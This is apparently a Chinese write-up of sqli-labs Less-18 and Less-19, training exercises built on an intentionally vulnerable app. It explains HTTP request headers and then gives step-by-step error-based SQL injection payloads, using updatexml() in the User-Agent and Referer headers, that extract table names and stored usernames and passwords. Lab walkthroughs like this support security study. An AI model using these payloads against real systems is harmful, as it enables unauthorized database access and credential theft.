Less18

基于错误_POST_User-Agent_请求头注入

0x01. HTTP请求头

这些在HTTP协议里讲的很详细，就不多说了，任何一本Web的书都会介绍。
这里列出几个常用请求头：

1. Host
   Host请求报头域主要用于指定被请求资源的Internet主机和端口号。
   如：Host: localhost:8088

2. User-Agent
   User-Agent请求报头域允许客户端将它的操作系统、浏览器和其他属性告诉服务器。登录一些网站时，很多时候都可以见到显示我们的浏览器、系统信息，这些都是此头的作用。
   如：User-Agent: Mozilla/5.0

3. Referer
   Referer包含一个URL，代表当前访问URL的上一个URL，也就是说，用户是从什么地方来到本页面。
   如：Referer: http://localhost:8088/sqlilabs/Less-18/

4. Cookie
   Cookie是非常重要的请求头，它是一段文本，常用来表示请求者身份等。
   如：Cookie: username=admin; password=admin

5. Range
   Range可以请求实体的部分内容，多线程下载一定会用到此请求头。
   如：表示头500字节：Range: bytes=0~499
     表示第二个500字节：Range: bytes=500~999
     表示最后500字节：Range: bytes=-500
     表示500字节以后的范围：Range: bytes=500-

6. X-Forwarded-For
   X-Forwarded-For即XXF头，它代表请求端的IP，可以有多个，中间以逗号隔开。
   如：X-Forwarded-For: 8.8.8.8

7. Accept
   Accept请求报头域用于指定客户端接收哪些MIME类型的信息。
   如：Accept: text/html

8. Accept-Charset
   Accept-Charset请求报头域用于指定客户端接收的字符集。如果在请求消息中没有设置这个域，默认是任何字符集都可以接收。
   如： Accept-Charset: gb2312

0x02. 寻找注入点

首先还是尝试什么都不对的情况：

回显能够显示你的IP地址，这里自然会想到是不是XFF头注入。一航师傅的WP也是这么写的，但是后来多次尝试未果，看后台源码后查资料发现是不对的。

$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];

源码使用HTTP_USER_AGENT只获取了HTTP请求头的一个部分：User-Agent。
而获取IP则使用了REMOTE_ADDR，这能直接获取TCP协议数据包的底层会话IP地址，它能被代理服务器或路由修改伪造，但非修改XFF头就可以更改的。

再看源码：

$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);

对POST的uname和passwd都做了check_input()处理，在Less17已经分析了这个函数，所以表单不存在注入点。

不论是否登录成功，都会回显IP。
登陆成功后回显uagent，并将uagent、IP、uname插入到security数据库的uagents表的uagent、ip_address、username三个字段中。

经过这次尝试可以看到：修改XFF头对IP没有影响，登陆成功会回显你的User-Agent。
这里要输入正确的账号和密码才能绕过账号密码判断，进入处理User-Agent部分。这跟现实中的注册登录再注入是比较贴合。

所以注入点就在User-Agent处。

0x03. 注入过程

我们已经得出注入语句为INSERT，根据Less17中的介绍，这里有很多方法可以注入，我们选择updatexml()注入。

这里我们仍需要根据回显报错来判断INSERT语句结构，首先任意尝试：

User-Agent: Hyafinthus' updatexml(1,concat('#',(database())),0)--+

可以看到uagent是在IP和uname之前的，即INSERT语句：

INSERT INTO table_name ('uagent','ip_address','username') VALUES ('$uagent','$IP','$uname')

步骤1：数据库名security

User-Agent: Hyafinthus' or updatexml(1,concat('#',(database())),0),'','')#

注意：这里并不是URL而是HTTP头，所以+并不会被转义为(空格)，于是末尾的注释符号要变为#。

步骤2：表名users

User-Agent: ' or updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),0),'','')#

注意：因为这里or的语法，User-Agent应为空。而步骤1成功的原因不确定，教程中也为空但没有影响，猜测是数据库版本的问题。

步骤3：字段名id、username、password

User-Agent: ' or updatexml(1,concat('#',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),0),'','')#

步骤4：数据

User-Agent: ' or updatexml(1,concat('#',(select * from (select concat_ws('#',id,username,password) from users limit 0,1) a)),0),'','')#

注意：同样因为错误信息只显示了一部分，使用limit偏移注入。

0x04. 吐槽

这篇比上一篇好写多了，sigh。

Less19

基于错误_POST_Referer_请求头注入

登录成功后发现回显的是Referer不是User-Agent，判断INSERT语句结构：

Referer: Hyafinthus' updatexml(1,concat('#',(database())),0)--+

发现用的表也改了，只有referer和IP：

INSERT INTO table_name ('referer','ip_address') VALUES ('$referer','$IP')

知道了查询语句便可以注入：

步骤1：数据库名security

Referer: ' or updatexml(1,concat('#',(database())),0),'')#

步骤2：表名users

Referer: ' or updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),0),'')#

步骤3：字段名id、username、password

Referer: ' or updatexml(1,concat('#',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),0),'')#

步骤4：数据

Referer: ' or updatexml(1,concat('#',(select * from (select concat_ws('#',id,username,password) from users limit 0,1) a)),0),'')#